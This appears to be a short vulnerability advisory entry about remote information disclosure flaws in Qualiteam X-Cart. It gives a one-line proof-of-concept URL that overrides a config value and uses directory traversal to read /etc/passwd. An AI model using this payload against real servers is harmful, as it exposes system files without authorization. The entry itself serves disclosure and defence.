• info
• discussion
• exploit
• solution
• references

Qualiteam X-Cart Multiple Remote Information Disclosure Vulnerabilities

No exploit is required to leverage this issue.

The following proof of concept has been provided:

http://servername/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd